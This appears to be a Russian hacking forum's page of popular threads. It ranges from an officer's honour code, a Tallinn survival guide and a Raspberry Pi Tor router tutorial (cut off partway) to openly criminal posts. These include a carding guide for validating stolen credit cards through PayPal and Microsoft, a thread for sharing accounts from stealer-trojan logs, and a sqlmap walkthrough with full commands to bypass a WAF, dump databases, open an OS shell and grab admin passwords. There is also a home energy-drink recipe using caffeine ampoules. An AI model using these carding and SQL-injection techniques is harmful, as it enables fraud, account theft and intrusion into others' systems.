Перейти к содержимому

Самый Популярный Контент


#9 Кодекс чести Русского Офицера 1904 года

Написано Joker 20 Июнь 2015 - 21:48

Приветствую, уважаемые. Не призываю следовать, но предлагаю ознакомиться. Некоторые положения данного кодекса актуальны даже сейчас. В конце концов это часть нашей истории.   

                                         

Кодекс чести Русского Офицера 1904 года.

                                                                                                                                                             

1. Не обещай, если ты не уверен, что исполнишь обещание.

 

2. Держи себя просто, с достоинством, без фатовства.

 

3. Необходимо помнить ту границу, где кончается полная достоинства вежливость и начинается низкопоклонство.

 

4. Не пиши необдуманных писем и рапортов сгоряча.

 

5. Меньше откровенничай — пожалеешь. Помни: язык мой — враг мой!

 

6. Не кути — лихость не докажешь, а себя скомпрометируешь.

 

7. Не спеши сходиться на короткую ногу с человеком, которого недостаточно узнал.

 

8. Избегай денежных счетов с товарищами. Деньги всегда портят отношения.

 

9. Не принимай на свой счет обидных замечаний, острот, насмешек, сказанных вслед, что часто бывает на улицах и в общественных местах. Будь выше этого. Уйди — не проиграешь, а избавишься от скандала.

 

10. Если о ком-нибудь не можешь сказать ничего хорошего, то воздержись говорить и плохое, если и знаешь.

 

11. Ни чьим советом не пренебрегай — выслушай. Право же, последовать ему или нет, останется за тобой. Сумей воспользоваться хорошим советом другого — это искусство не меньшее, чем дать хороший совет самому себе.

 

12. Сила офицера не в порывах, а в нерушимом спокойствии.

 

13. Береги репутацию доверившейся тебе женщины, кто бы она ни была.

 

14. В жизни бывают положения, когда надо заставить молчать свое сердце и жить рассудком.

 

15. Тайна, сообщенная тобой хотя бы только одному человеку, перестает быть тайной.

 

16. Будь всегда начеку и не распускайся.

 

17. Старайся, чтобы в споре слова твои были мягки, а аргументы тверды. Старайся не досадить противнику, а убедить его.

 

18. На публичных маскарадах офицерам не принято танцевать.

 

19. Разговаривая, избегай жестикуляции и не возвышай голос.

 

20. Если вошел в общество, в среде которого находится человек, с которым ты в ссоре, то, здороваясь со всеми, принято подать руку и ему, конечно, в том случае, если этого нельзя избежать, не обратив внимания присутствующих или хозяев. Подача руки не даёт повода к излишним разговорам, а тебя ни к чему не обязывает.

 

21. Ничто так не научает, как осознание своей ошибки. Это одно из главных средств самовоспитания. Не ошибается только тот, кто ничего не делает.

 

22. Когда два человека ссорятся — всегда оба виноваты.

 

23. Авторитет приобретается знанием дела и службы. Важно, чтобы подчиненные уважали тебя, а не боялись. Где страх — там нет любви, а есть затаенное недоброжелательство или ненависть.

 

24. Нет ничего хуже нерешительности. Лучше худшее решение, чем колебание или бездействие. Упущенный момент не вернешь.

 

25. Тот, кто ничего не боится, более могуществен, чем тот, кого боятся все.




#385 Список онлайн сервисов для хакинга и не только

Написано Joker 08 Июнь 2016 - 21:50

Бывает, что срочно нужно просканить какой то ресурс, но под рукой нет рабочей лошадки, а очень нужно, аж прет как нужно...

В списке то, что может потребоваться при аудите безопасности своего или чужого сайта.

История доменов
 http://who.ru - по ру, рф
 http://who.is - остальные

На чем сделан сайт, что за скрипты

 http://builtwith.com

Приблизительная статистика по сайту (чтоб примерно оценить размер трафика)

 http://similarweb.com

Хеши

http://hashkiller.co.uk
http://md5online.org
http://md5decrypt.net/en/

Онлайн сканер WordPress https://www.scanarch.com/wpscan.php

Сканер портов http://hideme.ru

​Эдакий микс никто и обрезанного хуиза  http://whatweb.net/
 

Буду тему дополнять, дописывайте другие онлайн тулзы.


  • AntoshkaBuh, nohnigecebybp74, nohnigecebyuk85 и 8 другим это нравится


#34 Энергетики. Детальный разбор. Приготовление в домашних условиях.

Написано Joker 30 Июнь 2015 - 12:57

Все вы знаете эти марки: RedBull, Gorilla, Flash, Burn, Bullit.
Производитель позиционирует данные напитки как "энергетическую заправку", содержащую полезные витамины и микроэлементы, оказывающее благотворное влияние на организм, помогающее взбодрится и сосредоточится, и при этом, не вредное для организма.
Но так ли это?


Положительные эффекты энергетиков.

- кратковременный стимулирующий эффект, увеличение работоспособности, способность к сосредоточению

- содержат таки некоторое количество "витаминно-углеводно-минерального" комплекса, что очень полезно для людей, осуществляющих умственную работу, а также спортсменам.

- глюкоза - это чистая энергия, уменьшает потребность в еде, позволяет дольше осуществлять деятельность.

- эффект около 3 часов, затем идет на спад.

- упаковка позволяет брать энергетики с собой, не заботясь об их сохранности и температуре.

 

Отрицательные эффекты энергетиков.

- передозировка стимулирующего комплекса приводит к повышению артериального давления, учащению числа сердечных сокращений, возникновению тревоги и страха, появлению головной боли.

- высокие дозы биологически активных веществ вызывают нарушение сна, возбуждение, беспокойство, тахикардию, повышение артериального давления, аритмию, тошноту, рвоту, непродолжительную депрессию и даже эпилепсию.

- частое употребление вызывает проблемы с сердечно-сосудистой и нервной системами, бессонницу, утомлением, быстрым истощением ресурсов организма.

- сильное токсическое действие на печень и головной мозг.

- энергия не прибавляется к запасу орагнизма, а потребляется из ресурсов.

- при употребления сверх нормы возможно значительное повышение артериального давления и уровня сахара в крови.

- витамины, содержащиеся в энергетиках, имеют гораздо худшую усвояемость, чем изолированный прием витаминов (меньше 2%).

- строгое противопокозание к употреблению людям с заболеваниями нервной и сердечно-сосудистой системой.

- развитие толерантности и психологическая зависимость.

- в большом количестве витамины группы В вызывают тремор -  дрожь в руках и ногах.

- мочегонный эффект способствует выведению калия, натрия и магния из орагнизма, при критических отметках может привести к смерти путем остановки сердца (блокада проводимости, нехватка калия).

- гипервитаминоз редко развивается, ввиду плохой усвояемости, однако если уж разовьется, то с тяжжкими последствиями.


Главное правило!
Не употреблять более 1 банки в сутки, отдыхать после приема хотя бы сутки, не пить после занятий спортом, не миксовать со стимуляторами.

Отдельно стоит сказать о сочетании с алкоголем.
Энергетики выполняют стимулирующую функцию, а алкоголь — угнетающую (почти как качели). Вред такого сочетания заключается в способности энергетиков замаскировать влияние алкоголя, в результате которой человек не сможет принять его влияние в расчёт, ослабляя контроль за количеством выпитого. Самое опасное в таком употрблении - вымывание электролитов, очень высок риск летального исхода.


ДЕЛАЕМ ЭНЕРГЕТИК ДОМА ИЗ ГОВНА И ПАЛОК ДОСТУПНЫХ И ДЕШЕВЫХ КОМПОНЕНТОВ

Нам понадобится:

Основа:
1) Камелия китайская
2) Листья малины, мяты, ежевики, клубники, смородины
3) Сахар
4) Вода
5) Соль
6) Мед

Наполнение:
1) Ампулы с витаминами: В1, B2, В6, PP, C
2) Ампулы с раствором кофеина-бензоата натрия
3) Ампулы с 40% глюкозой
4) Пузырек настойки женьшеня

Приготовление:
1) Берем камелию и листья растений, мелко рубим, очищаем от пыли, промываем в ледяной воде
2) Кипятим 1 литр воды
3) В большую емкость с плотной крышкой раскладываем нашу травку
4) Сыпем туда половину чайной ложки соли и две столовых ложки сахара
5) Заливаем кипятком, настаиваем 5 минут, добавляем 2 столовые ложки меда (гречишного или другого темного)
6) Перемешиваем и ждем еще 5 минут
7) Сливаем отвар в термос, закрываем, пусть пока стоит
8) Наливаем полстакана холодной прокипяченной воды
9) Открываем по 2 ампулы витаминов группы В, 3 ампулы РР и 5 ампул витамина С - сливаем в стакан
10) Открываем 3 ампулы кофеина-бензоата, сливаем в стакан
11) Открываем 2 ампулы глюкозы, сливаем в стакан
12) Наливаем столовую ложку женьшеня, сливаем в стакан
13) Тщательно перемешиваем, открываем термос, вливаем туда содержимое стакана
14) Тщательно перемешиваем, вращая термос в руках
15) Настаивать 30 минут

Напиток готов к употреблению.

Вуаля, нахер ваши ред булы :) Однажды делал такой, больше камелию найти не мог, а выращивать её как то не с руки.




#349 Кардинг. Актуальный способ проверки CC на валид

Написано Hacker 02 Май 2016 - 17:55

Вариант с палкой

Нужен дедик или SSH туннель страны CC. Желательно чистые.

1. Заходим на paypal.com
2. Регистрируйте аккаунт по фулке, которую вам дали по карте. Email используйте 10minutemail.net например, а телефон случайный, страны CC.
3. Пропускаете добавление карты и банковского счета.
4. Переходите в раздел Wallet(с кошельками и банковскими счетами)
5. Нажимаете внизу Classic Site
6. Нажимаете "Добавить карту"
7. Вводите данные карты(данные холдера вбиты при регистрации).

 

Что вы можете увидеть:
1. Invalid CVV2 or DATE of EXP...
Ну тут все ясно. Не валид по основным данным.
2. Invalid Billing Address...
Данные карты верные, а вот данные холдера(адрес или имя неверные).
3. Bank didn't approve the trancsation...
Вроде бы все верно, но банк не одобрил транзакцию.
Формально валид.
4. Карта успешно привязалась к PP аккаунту.
Это значит, что все прошло великолепно.

 

Вариант с hotmail.com и microsoft

Делаем почту на hotmail.com - там телефон можно указать любой, 10 рандомных цифр. затем заходим сюда https://commerce.mic...help?lang=en-US Выбираем пеймент опшнс. Далее вбиваем. Если после вбива поля становятся, оранжевыми - карта не валид. Либо она привязывается. Потом делаем remove и вбиваем следующую. Процедуру повторяем 4-5 раз и регаем почту заново.


  • MyleneSi, nohnigecebybp74, nohnigecebyuk85 и 7 другим это нравится


#315 Прошу поделится опытом. Приложение.

Написано den424 20 Апрель 2016 - 10:53

Всем здравствуйте. Можно сделать приложение для андроид или  других систем, отправляющее смс при входе в помещение? Если можно, ищу того кто сделает.


  • MyleneSi, nohnigecebybp74, nohnigecebyuk85 и 7 другим это нравится


#208 Правила и советы по "выживанию" в Таллинне (Эстония)

Написано Joker 19 Январь 2016 - 14:24

Скорее всего вам особо она не понадобится, но для общего развития, надеюсь, будет полезно. В жизни всякое бывает и этот небольшой гайд может помочь вам в определённых моментах, будь то путешествие или вынужденная командировка.

 

И так, приступим...

Город Таллинн делится на 8 районов:
Северо-запад – Хааберсти ( в простонародье Ыйсмяэ) - спальный район на западе.
Кесклинн ( по эстонски центр города )
Ласнамяэ – спальный район на востоке города. Чем дальше – тем больше наркоманов. Почти всё население – русскоязычное.
Пыхья-Таллинн (в простонародье Копли) – спальный район на севере города. Чем дальше – тем больше наркоманов(шутка в том, что в конце района, стоит полицейский порт). Почти всё население – русскоязычное. В начале района несколько лет назад открылся огромный полицейский участок, приятная, длинная дорожка до пляжа, маленький микрорайон с новыми, квартирными домами, так же стоит самая большая в восточной европе база НАТО для борьбы с киберпреступньстью.
Мустамяэ – спальный район, достаточно зелёный, есть студенческий городок. В определённых местах встречаются быдлоточки но в меньшей мере, нежели Ласна или Копли.
Нымме – сектор маленьких, частных домиков, местами заводов. Живут пенсионеры и иногда алкоголики.
Пирита – обеспеченный район, близ моря. Есть пляж, пирс, яхты, кокаин частные дома среднего-вышесреднего классов.
Кристийне – хороший район, между центром и спальными,в котором хоть и много общежитий различного характера, уровень преступности весьма невелик.

 

--------------------------------------------------

 

Представим ситуацию: вы оказались в этом городе (убежали от кровавой гебни) вам нужно – жильё, связь, питание проститутки и прибыль:

 

1)    Жилье

Существуют ночлежки для бомжей, если вы уж совсем отчаялись.
Либо:
Идём в любом супермаркете в филиал оператора связи (EMT, ELISA, TELE2) или магазин техники (EURONICS), берём любое устройство «потестить» и заходим на сайт «City24 точка ee». Выбираем великий и могучий и ищем.

 

Нормальную, однокомнатную квартирку, даже с ремонтом можно снять за 200+- евро в месяц, что копейки в сравнении с большими городами РФ или Еуропки. В большинстве своём требуется взнос за второй месяц + процент риелтору (который всегда можно обойти). Если вы не хотите светить документы, это тоже можно сделать, уже договорившись на прямую.

Либо:
Воспользоваться общежитиями. Цены сказать не могу, но уверен, что за 100-150 евро в месяц можно найти койку, а там уж точно насрать на документы.


Для сливания с массой, подходит в целом любой район, за исключением центра (много уличных камер). Соседи редко проявляют интерес друг к другу, если это не всезнающие бабки.

 

2)    Связь

На любой заправке «STATOIL» или киоске «R-KIOSK» (палатке) продаётся телефон нокия с фонариком и змейкой с пакетом компании ELISA (лучшее соотношение цена/качество) за 30 евро. Преимущество в том, что вы можете приобрести симку  без регистрации и смс документов.

Есть небольшой лайфхак, как выбить себе крутой договор, но для этого нужно светить документами и не уверен сработает ли он для нерезидентов Эстонии, но почему нет?
Приходите в например «ELISA», заключается самый простой договор, например за 10 евро в месяц + 3 за подключение за 100 минут, 100 смс и 1 гб 4G в месяц, на следующий день приходите к конкурентам в «TELE2» или «EMT» и говорите мол, мне не нравится Элиса, что вы можете мне предложить? Переходите к ним со своим номером, на более выгодные условия и ждёте. Через несколько дней вам позвонят из Элисы и буду умолять, боготворить вас как Аллаха с целью переманить обратно. Знакомого так вернули обратно, за 5 евро в месяц ему дали 1000 минут в любую сеть, 1000 смсок, 50гб 4G интернета + планшет чуть бесплатно не отдали.

 

Коротко об операторах:
TELE2 – наёбуют(симка лежала на полке, а в счёте было указано, что на неё игры качали и звонили в Ботсвану), дёшего, плохое качество.
ELISA – хорошее соотношение цена/качество
EMT – массоны, дорого, качественно.

Телефоны(как и всё, что угодно) можно покупать на местной альтернативе АВИТО – okidoki точка ee.

Если вы не на договоре у оператора, в любом R-Киоске можно закинуть денег на телефон. На ломаном русском, но объяснят как пользоваться.
Терминалов как в РФ здесь не существует ВООБЩЕ (да и вроде нигде в еуропе)

 

3)    Питание
Цены само собой разные в зависимости от сети магазинов. На рынках не особо дешевле, а порой и дороже чем в супермаркетах. Из дешёвых есть магазины Maxima (x – маленький, бомжатский, 2x – средний с нормальным выбором, 3x – огромный но их мало), Prisma. Selver и Rimi – дороже. Solaris/kaubamaja – ещё дороже.+ европки, что различные заморские вкусности – заметно дешевле чем в РФ. Маленький треугольник сыра с плесенью попроще за 1 евро можно взять, вяленое мясо, парма – по паре евро за упаковку. Алкоголь с 10 до 22, лучше покупать в магазинах сети Regalia. Человеку из СНГ, который сам готовит, сразу в глаза бросится пластмассовый запах овощей и фруктов, которые на порядок хуже тех, что в РФ, хоть и выглядят продукты в разы лучше.

В месяц на одного можно выжить за 100 евро, но это если уж голодать и жрать только макароны и катлеты-полуфабрикаты. За 300 евро в месяц можно шиковать по царски.

 

4)    Безопасность

Тупо проверять документы, если вы не делаете ничего незаконного никто не будет. Патруль может так же быть в гражданском, но обычно это либо от нарушителей ПДД, либо от наркоманов. Максимум когда проверят документы, если вы пьёте на улице алкоголь. В вечер пятницы  и субботы в старом городе происходит тотальное блядство и содомия, легко получить/дать пизды, но обычно, если сам напрашиваешься.
Полиция всегда говорит по русски, если вы того просите.
Киберпреступность – Эстония считается одной из лидирующих стран по развитию интернетов и всего, что с этим связано. Город Кохтла-Ярве в народе считается городом киберпреступников. Лично у меня в Таллинне, есть знакомых 5 кто на этом живёт и это только те о ком я точно знаю. Многие работают дома через ВПН, особо не парясь уже много лет(простые схемы, вещевуха)

 

5)    Транспорт

Для местных жителей проезд на автобусах/троллейбусах/трамваях бесплатный. Для остальных есть MasterCard такие же зелёные карточки, которые можно купить в любом R-Kiosk’е за 2 или 3 евро, зарядить на них денег и кататься. Можно кататься зайцем и смотреть вперёд, при виде контроллёров, резко проводить картой по терминалу который стоит у любого входа/выхода. Некоторые местные даже не проводят своей бесплатной картой, за что могут получить анальную кару при контроллёрах(которые кстати вечером вообще не появляются, да и в целом уже достаточно редкое явление), а не делают они это по следующей причине – карта у местных привязывается к личному коду(isikukood) жителя Эстонии, а у определённых служб появляется информация мол такой-то в такое-то время зашёл в такой-то транспорт на такой-то остановке, что слегка деанонит. Спиздить чужую карточку, местного человека рискованно ибо контроллёры могут попросить документ удостоверящий личность дабы сверить не пытаетесь ли вы их нае*ать.
Общественный транспорт в целом устроен благополучно, в интернете есть расписание (бывает наёбывают на пару минут, так что лучше приходить заранее), ходит часто в основном(если вы не в жопе мира живёте). В Ласнамяе из центра так вообще сказка добираться – в конце автобусов стабильно сидит какойнить 16 летний DJ Uasily под джинтоником и на динамике своего яТелефона пять эсс с расколотым экраном слушает триагрутрику + транспорт едет быстрее чем в гораздо более близкие географически Муста или Копли.

Такси – зависит от фирмы. TALLINK и TULIKA (их сразу видно по фирменным машинам) очень дорого, пользуются только финны и мажоры. Заходим на Taksod точка net и выбираем. В среднем из центра в сердце мустамяе/копли/ласнамяе стоить поездка будет около 5-6 евро. Но если вы синие в кал то вас почти полюбому будут наёбывать и могут взять 20 даже по счётчику там, где должны 5.

В пятницу-субботу из центра такси лучше заказывать(ждать можно до часу на эконом фирмах, а может и повезёт и машина будет через 2 минуты) а не ловить стоящую машину – они хрен по счётчику поедут и будут ждать до посинения бухих людей, готовых больше забашлять, лишь бы свалить из этого ада. В таком случае правда, можно позвонить в фирму и сказать мол такой-то такой пидр отказывается везти по счётчику, за что он получить по филейной части.

6)    Работа
Работу неофициальную, можно поискатьь на том же okidoki точка ee, могут и нае*ать, так что будьте осторожны. Официальная ищется на сайтах а ля cv точка ee. Не знаю как для неместных, но если у вас гражданство РФ/Таджикистана/Намибии и есть при этом прописка в Ээстимаа, то вы свободно устраиваетесь куда угодно. + европки, что нет тупой бюрократии как в РФ, вам не нужны никакие ссаные трудовые книжки, анализ кала, флюорографии и всё такое. Нужен документ с личным кодом и номер вашего банковского счёта, куда будут зарплату слать. ВСЁ. Если в общепит официанткой, то ещё и справка у врача который посмотрит вам на горло и выпишет, если вы не похожи на загнивающего бомжа. Стоит такая справка официально около 15-20 евро.
Учитывая географические моменты, можно заниматься много чем. Люди возят сигареты в Эстонию из Рашки, в Швецию/Финку/Норвежку из Рашки, алкоголь, гопают пьяных финнов в старом городе, работают гидами и т.д. и т.п.
Если устроились на халтуру к русским – не думайте, что раз свои то не наебут. Что касается коренного населения – тоже могут нае*ать. После работы при выплате многие совестливые начальники составляют бумажку мол я такой-то такой-то заплатил такому-то такому за такую-то работу, что бы налоговая не доебалась.
Ест обширный выбор так называемого «алкотаксо» - люди продающие алкоголь после 22:00 вообще без лицензии. Раньше был грамотный обход закона(скорее всего и сейчас) мол при встрече «продавец» даёт бумагу, на которой написано «я – Вася Пупкин сдаю в аренду бутылку водки Лауа Виин 0,5л господину Тармо Рюйтли, в залог беру 10 евро, в случае поломки бутылки или её вскрытия я забираю себе деньги в знак компенсации. Подпись, дата.»(всегда задумывался, почему в РФ никто так не делает?) Конечно цены у таких деятелей гораздо больше и никто не поедет в соседний район в 2 часа ночи продать вам 2 банки пива( на бензин больше уйдёт).

Погода в прибалтике – гавно. Летом можно позагарать около месяца, остальное дожди и ветер. Обычно самый сок в июнь-июле, в остальном всё как в Питере, только на пару градусов теплее.

 

7)    Социум

Люди приветливы до тех пор как думают, что вы – турист. Если они подумают, что вы местный быдлорусский, который из принципа не учит великий и могучий эстонский язык, то на вак посмотрят косым еблом дауна и будут пиздеть на своём пока вы не уйдёте. Лучше улыбнуться, сказать волшебное слово «турист» и спросить чего пожелаете. В идеале ходить и везде разговаривать по англицки, но если у вас такого скилла нет, то либо вариант выше, либо ищите русских ребят (почти половина населения).

Дамы в большинстве своём шкуры, готовые почпокаться с иностранцем за половину содержимого его портмоне.(как и везде)
Проституция в стране не запрещена(но и не разрешена) в гугле можно поискать блядищь, раньше был сайт lits точка ee но не уверен работает ли он сейчас.
Молодое поколение эстов практически не владеет русским, у многих средненькое владение англицким, русская молодежь обычно знает свой язык, эстонский(50/50) и англицкий. Взрослые эсты обычно владеют русским, хоть и не всегда хотят на нём говорить, но вас пойму.

 

Словарик.

Tibla – оскорбительное название русскоязычного быдло от эстов.
Талап/курат – оскорбительное название эстоноязычного быдла от русских.
Tere – здрасти
Aitah (айтях) – спасибо
Palun(палун) – пожалуйста
Lits – шлюха

 

П.С.
По соседству есть город Маарду, куда наркоманы по осени ездят грибы собирать в лес, обычно там же ими и упарываются.

П.П.С.
В городе огромное количество казино, но НИКОГДА не расплачивайтесь там своей банковской карточкой, даже за пиво. В казявах дешёвый алкоголь и уютно + дают целых 5 евреев на просёр при первом посещении, но ни один банк не даст кредит если узнает, что вы посещали казино, а он узнает.


  • MyleneSi, nohnigecebybp74, nohnigecebyuk85 и 7 другим это нравится


#7 Раздача аккаунтов с логов стилера

Написано R00t 20 Июнь 2015 - 21:06

В этой теме выкладываем аккаунты с логов ваших троянцев. 

Делимся чем не жалко с логов.

 

Кто берет аккаунты, не забывайте плюсовать репу авторов раздач. 




#390 Взлом сайтов при помощи sqlmap

Написано XakerServis 12 Июнь 2016 - 17:33

Рассмотрим поиск автоматом на ресурсе уязвимости и эксплуатации.

sqlmap -u https://target.com --dbs --crawl=2 --batch --level 3 --risk 3 --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfo

​​Тамперы - для обхода WAF, использовать пачкой тамперы не совсем разумно, выбираем некоторые и впуть.

Если уязвимость найдена самостоятельно: 

-u https://target.com/index.php?id=INJECT_HERE (или то, что там было на момент нахождения, например число 10)  --dbs

​Вывод базы

Когда базы вывели:

-u https://target.com/index.php?id=INJECT_HERE -D имя_базы --tables
-u https://target.com/index.php?id=INJECT_HERE -D имя_базы -T имя_таблицы  --columns
-u https://target.com/index.php?id=INJECT_HERE -D имя_базы -T имя_таблицы --dump  ( дампим что нам надо) можно сипользовать --С ( указываем что нам конкретно надо login, password, id)

​Параметр --proxy не забываем

-u https://target.com/index.php?id=INJECT_HERE --banner --current-db --current-user --is-dba  <---- доп информация
-u https://target.com/index.php?id=INJECT_HERE --os-shell зальет шелл, если есть на это права
--hex  <--- поможет в некоторых случаях вывести данные

Что проделано?
1) Найдена дыра
2) Слита база
3) Найден пасс админа
4) Далее по своему усмотрению.


  • nohnigecebybp74, nohnigecebyuk85, Josephwok и 6 другим это нравится


#388 Tor Роутер анонимайзер Onion Pi + настройка 3G роутера

Написано XakerServis 12 Июнь 2016 - 15:09

Хочу представить вам материал о том как собрать и настроить свой 3g tor роутер на плате raspberry pi. Данный девайс придумал не я, а ребята из Adafruit   ( learn.adafruit.com/onion-pi/overview ) . Я только добавил 3g модем . Получается 3g-tor-дальше на ноуте уже vpn ssh  и т.д. Вообще мне это напоминает операционную систему Whonix . Для того чтобы собрать роутер нам понадобятся:

  1. платa Raspbeery pi Model B или новее

  2. sd карта 4Гб минимум

  3. провод microUSB ( для питания от разетки или usb порта)

  4. wi-fi адаптер ( я изспользовал d-link dwa 125 и именно под него буду устанавливать драйвера, если у вас другой адаптер то google.com  в помощь smile.png

  5. 3G модем ( в моем случае Билайн ZTE MF 180 )

  6. сетевой кабель для подключения к домашнему роутеру​

Глава 1. Подготовка

  1. Первое что нами нужно сделать это скачать образ raspbian c сайта ( raspberrypi.org/downloads/raspbian/)

  2. После того как скачали образ вставляем нашу sd карту в кардридер и с помощью Win32DiskImager записываем его на карту. Ну вот, мы готовы к первому запуску.

  3. Будем подключаться по SSH. Для этого подключаем Raspberry pi с помощью сетевого кабеля к роутеру,  тем самым мы получим ip по DHCP. Чтобы узнать ip нужно скачать и запустить IpScan. Скачали, запустили, видим нашу raspberry, копируем ip и  подключаемся с помощью Putty. По умолчанию логин pi, пароль raspberry.

  4. Как только подключились первым делом нужно выполнить команду

    sudo raspi-config

    далее Expand file system  (увеличение памяти на всю карту). Далее в главном меню
    выбираем internationalisation options далее  change locale  и выбираем нужный нам язык ( я ставил ru UTF 8 ),выходим из меню и перезагружаемся

     sudo reboot

    .

  5. Далее нам нужно определяем версию ядра и переписываем ( в моем случае 3.12.28+ # 709 )  для правильного подбора драйверов командой,

    sudo uname -a

     

  6. Когда версия ядра известна далее нужно подобрать драйвера по версии ядра для wi fi адаптера на сайте fars-robotics.net/ . Ищем в списке нужную нам версию. P.S. Тут есть один нюанс, если скачивать отсюда то там в архиве почему то нет и файла rtl8188eufw.bin , его нужно будет скачать отдельно и положить в папку командой

    sudo wget https://raw.githubusercontent.com/lwfinger/rtl8188eu/c83976d1dfb4793893158461430261562b3a5bf0/rtl8188eufw.bin -O /lib/firmware/rtlwifi/rtl8188eufw.bin
    

  7. Далее нужно скачать драйвер в зависимости от версии ядра

    sudo wget https://dl.dropboxusercontent.com/u/80256631/8188eu-201xyyzz.tar.gz # где xyyzz здесь и далее это дата версии ядра)
    
  8. далее распаковываем

    sudo tar -zxvf 8188eu-201xyyzz.tar.gz
  9. далее

     

    sudo install -p -m 644 8188eu.ko /lib/modules/$(uname -r)/kernel/drivers/net/wireless # вместо $(uname -r) пишем версию ядра)

     

     

  10. Далее

     

    sudo insmod /lib/modules/$(uname -r)/kernel/drivers/net/wireless/8188eu.ko # так же вставляем свою версию ядра как в примере выше)

     

  11. и последняя команда 

     sudo depmod -a
  12. перезагружаем

    sudo reboot
  13. Затем вытаскиваем и сразу же вставляем wi fi адаптер обратно,  через несколько секунд он заморгает показывая тем самым что всё сделано правильно.

  14. Далее командой

    ifconfig -a

    проверяем появилась ли wlan0, если да то переходим к главе 2


Глава 2. Настройка Wi fi точки доступа

Итак, сначала установим нужный софт для настройки нашей точки доступа.

  1. Сначала обновимся

    sudo apt-get update
  2. Далее устанавливаем

    sudo apt-get install hostapd isc-dhcp-server
  3. Собираем свой hostapd. Скачиваем исходники с сайта realtek.com.tw/downloads/downloadsView.aspx?Langid=1&PNid=21&PFid=48&Level=5&Conn=4&DownTypeID=3&GetDown=false&Downloads=true  вводом команды

    sudo wget http://12244.wpc.azureedge.net/8012244/drivers/rtdrivers/cn/wlan/0001-RTL8188C_8192C_USB_linux_v4.0.2_9000.20130911.zip

     

  4. Далее распаковываем

    sudo unzip 0001-RTL8188C_8192C_USB_linux_v4.0.2_9000.20130911.zip

     

  5. cd RTL8188C_8192C_USB_linux_v4.0.2_9000.20130911

     

  6. далее

    cd wpa_supplicant_hostapd

     

  7. далее

    sudo tar -xvf wpa_supplicant_hostapd-0.8_rtw_r7475.20130812.tar.gz

     

  8. далее

    cd wpa_supplicant_hostapd-0.8_rtw_r7475.20130812

     

  9. далее

    cd hostapd 

     

  10. далее

    sudo make

     

  11. далее

    sudo make install

     

  12. sudo mv hostapd /usr/sbin/hostapd

     

  13. sudo chown root.root /usr/sbin/hostapd

     

  14. sudo chmod 755 /usr/sbin/hostapd

     

Когда с hostapd всё готово то идем дальше.
Будем устанавливать DHCP server:

sudo nano /etc/dhcp/dhcpd.conf

, в файле находим строки

option domain-name "example.org";
option domain-name-servers ns1.example.org, ns2.example.org;

  нам нужно закомментироватьих поставив #   перед ними чтобы получилось

  #option domain-name "example.org";
#option domain-name-servers ns1.example.org, ns2.example.org; 

далее находим ниже строки

 # If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
#authoritative; 

и убираем #   чтобы получилось

 # If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
authoritative; 

далее прокручиваем файл в самый конец вниз и добавляем в самом конце оставив пробел в одну строку между кодом и последней строкой (это важно, т.к. просто не будет работать ничего)

 
subnet 192.168.42.0 netmask 255.255.255.0 {
range 192.168.42.10 192.168.42.50;
option broadcast-address 192.168.42.255;
option routers 192.168.42.1;
default-lease-time 600;
max-lease-time 7200;
option domain-name "local";
option domain-name-servers 8.8.8.8, 8.8.4.4;
}

Затем сохраняем изменения нажав ctrl+x , затем y для потдверждения.

Теперь нам нужно запустить наш сервер командой

sudo nano /etc/default/isc-dhcp-server

  и  в самом низу в строчке

INTERFACES=""  

вписать wlan0 , чтобы получилось

INTERFACES="wlan0"

   сохраняем изменения нажав ctrl+x , затем y для потдверждения.

Теперь нам нужно сделать ip адрес статическим
Для это сначала отключаем wlan0   командой

sudo ifdown wlan0

далее нам нужно отредактировать файл

sudo nano /etc/network/interfaces

... 
  удаляем весь текст и приводим к такому виду копируя и вставляя весь выделенный ниже текст:

auto lo

iface lo inet loopback
iface eth0 inet dhcp

allow-hotplug wlan0

iface wlan0 inet static
  address 192.168.42.1
  netmask 255.255.255.0

#iface wlan0 inet manual
#wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
#iface default inet dhcp 

Сохраняем файл  и выходим нажав ctrl+x , затем y для подтверждения.

Далее присвоим нашему wi fi адаптеру статический ip адрес  введя команду

sudo ifconfig wlan0 192.168.42.1

  .

Теперь нужно собрать свою точку доступа. Мы будем делать защищенную сеть , доступ к которой будет по паролю. Хотя в принципе вы можете сделать и открытую сеть.
Вводим команду

sudo nano /etc/hostapd/hostapd.conf 

   
и редактируем : нужно вставить текст написанный ниже:

interface=wlan0
driver=rtl871xdrv
ssid=Pi_AP
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=Raspberry
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP

Далее

sudo nano /etc/default/hostapd

там ищем строку

#DAEMON_CONF=""

 
должно получиться (не забываем убрать перед строкой # )   .

DAEMON_CONF="/etc/hostapd/hostapd.conf"

  .

Далее будем настраивать NAT трансляцию. Пишем команду

sudo nano /etc/sysctl.conf

,  спускаемся в самый низ текста и в новой строке вставляем

 net.ipv4.ip_forward=1 

Сохраняем файл  и выходим нажав ctrl+x , затем y для подтверждения.
Далее пишем

sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"

     

Далее настроим IP tables введя по очереди строки ниже :

sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT

Потом настраиваем автозапуск вместе с системой введя команду

sudo sh -c "iptables-save > /etc/iptables.ipv4.nat"

Далее пишем

sudo nano /etc/network/interfaces

   и добавляем в конец всего текста

 up iptables-restore < /etc/iptables.ipv4.nat 

чтобы между вставленным текстом и текстом выше был пустая строка. Сохраняем файл  и выходим нажав ctrl+x , затем y для подтверждения.
Далее скачиваем hostapd  c сайта adafruit 

sudo wget http://adafruit-download.s3.amazonaws.com/adafruit_hostapd_14128.zip

Далее распаковываем

sudo unzip adafruit_hostapd_14128.zip

Потом пишем

 sudo mv /usr/sbin/hostapd /usr/sbin/hostapd.ORIG 

Затем

